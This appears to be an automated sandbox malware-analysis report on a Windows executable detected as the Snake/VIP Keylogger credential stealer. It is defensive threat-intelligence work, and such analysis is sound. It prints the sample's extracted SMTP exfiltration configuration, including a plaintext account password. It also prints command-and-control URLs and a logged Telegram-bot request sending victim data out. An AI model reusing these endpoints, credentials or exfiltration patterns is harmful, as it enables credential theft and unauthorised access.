Edit tour

Windows Analysis Report
z64BLPL.exe

Overview

General Information

Sample name:	z64BLPL.exe
Analysis ID:	1519553
MD5:	9c7cf85d2fa1d9c0b6c591b94cbf2830
SHA1:	55822a8ed3ceda0fc325d998af2e379fb05a948e
SHA256:	fe777d4ff348afb74ba7556da56b29a4ee0a66f7b044674fd1f18641573337f2
Tags:	exeuser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

AI detected suspicious sample

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

z64BLPL.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\z64BLPL.exe" MD5: 9C7CF85D2FA1D9C0B6C591B94CBF2830)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
z64BLPL.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
z64BLPL.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
z64BLPL.exe	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
z64BLPL.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
z64BLPL.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df58:$a1: get_encryptedPassword 0x2e275:$a2: get_encryptedUsername 0x2dd68:$a3: get_timePasswordChanged 0x2de71:$a4: get_passwordField 0x2df6e:$a5: set_encryptedPassword 0x2f624:$a7: get_logins 0x2f587:$a10: KeyLoggerEventArgs 0x2f1ec:$a11: KeyLoggerEventArgsEventHandler
z64BLPL.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd50:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3f3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b650:$a4: \Orbitum\User Data\Default\Login Data 0x3c02f:$a5: \Kometa\User Data\Default\Login Data
z64BLPL.exe	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb7d:$s1: UnHook 0x2eb84:$s2: SetHook 0x2eb8c:$s3: CallNextHook 0x2eb99:$s4: _hook
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dd58:$a1: get_encryptedPassword 0x2e075:$a2: get_encryptedUsername 0x2db68:$a3: get_timePasswordChanged 0x2dc71:$a4: get_passwordField 0x2dd6e:$a5: set_encryptedPassword 0x2f424:$a7: get_logins 0x2f387:$a10: KeyLoggerEventArgs 0x2efec:$a11: KeyLoggerEventArgsEventHandler
00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: z64BLPL.exe PID: 7268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: z64BLPL.exe PID: 7268	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: z64BLPL.exe PID: 7268	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: z64BLPL.exe PID: 7268	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15c3eb:$a1: get_encryptedPassword 0x15c6fe:$a2: get_encryptedUsername 0x15c205:$a3: get_timePasswordChanged 0x15c30e:$a4: get_passwordField 0x15c401:$a5: set_encryptedPassword 0x15e8aa:$a7: get_logins 0x15e80d:$a10: KeyLoggerEventArgs 0x15e476:$a11: KeyLoggerEventArgsEventHandler
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.z64BLPL.exe.690000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.z64BLPL.exe.690000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.z64BLPL.exe.690000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.0.z64BLPL.exe.690000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.0.z64BLPL.exe.690000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2df58:$a1: get_encryptedPassword 0x2e275:$a2: get_encryptedUsername 0x2dd68:$a3: get_timePasswordChanged 0x2de71:$a4: get_passwordField 0x2df6e:$a5: set_encryptedPassword 0x2f624:$a7: get_logins 0x2f587:$a10: KeyLoggerEventArgs 0x2f1ec:$a11: KeyLoggerEventArgsEventHandler
0.0.z64BLPL.exe.690000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3bd50:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3b3f3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3b650:$a4: \Orbitum\User Data\Default\Login Data 0x3c02f:$a5: \Kometa\User Data\Default\Login Data
0.0.z64BLPL.exe.690000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2eb7d:$s1: UnHook 0x2eb84:$s2: SetHook 0x2eb8c:$s3: CallNextHook 0x2eb99:$s4: _hook
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 192.250.231.25, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\z64BLPL.exe, Initiated: true, ProcessId: 7268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:10:01.211022+0200	2803305	3	Unknown Traffic	192.168.2.4	49732	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T17:09:59.130992+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	193.122.6.168	80	TCP
2024-09-26T17:10:00.568500+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49730	193.122.6.168	80	TCP
2024-09-26T17:10:22.605931+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	193.122.6.168	80	TCP
2024-09-26T17:10:31.334225+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49740	193.122.6.168	80	TCP
2024-09-26T17:10:35.905707+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49742	193.122.6.168	80	TCP
2024-09-26T17:10:36.584155+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49742	193.122.6.168	80	TCP
2024-09-26T17:10:38.849813+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49744	193.122.6.168	80	TCP
2024-09-26T17:10:42.177920+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49746	193.122.6.168	80	TCP
2024-09-26T17:10:43.662331+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49748	193.122.6.168	80	TCP
2024-09-26T17:10:45.099812+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	49750	193.122.6.168	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: z64BLPL.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://aborters.duckdns.org:8081	URL Reputation: Label: malware
Source: http://anotherarmy.dns.army:8081	URL Reputation: Label: malware

Found malware configuration

Source: 0.0.z64BLPL.exe.690000.0.unpack

Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: z64BLPL.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: z64BLPL.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: z64BLPL.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2

Source: z64BLPL.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 00D3F2D5h	0_2_00D3F138
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 00D3F2D5h	0_2_00D3F324
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 00D3FA91h	0_2_00D3F7EC
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 06693360h	0_2_06692F48
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 06690D0Dh	0_2_06690B30
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 06691697h	0_2_06690B30
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 06692C21h	0_2_06692970
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669D0C9h	0_2_0669CE20
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669D979h	0_2_0669D6D0
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 06693360h	0_2_06692F37
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669E229h	0_2_0669DF80
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669EF31h	0_2_0669EC88
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669F7E1h	0_2_0669F538
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669D521h	0_2_0669D278
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 06693360h	0_2_0669328E
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669DDD1h	0_2_0669DB28
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669E681h	0_2_0669E3D8
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	0_2_06690040
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669EAD9h	0_2_0669E830
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669F389h	0_2_0669F0E0
Source: C:\Users\user\Desktop\z64BLPL.exe	Code function: 4x nop then jmp 0669FC39h	0_2_0669F990

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: z64BLPL.exe, type: SAMPLE
Source: Yara match	File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CNSV-LLCUS CNSV-LLCUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.electradubai.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 15:10:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: z64BLPL.exe	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: z64BLPL.exe	String found in binary or memory: http://aborters.duckdns.org:8081
Source: z64BLPL.exe	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: z64BLPL.exe	String found in binary or memory: http://checkip.dyndns.org/q
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.electradubai.com
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z64BLPL.exe	String found in binary or memory: http://varders.kozow.com:8081
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: z64BLPL.exe	String found in binary or memory: https://api.telegram.org/bot
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: z64BLPL.exe	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
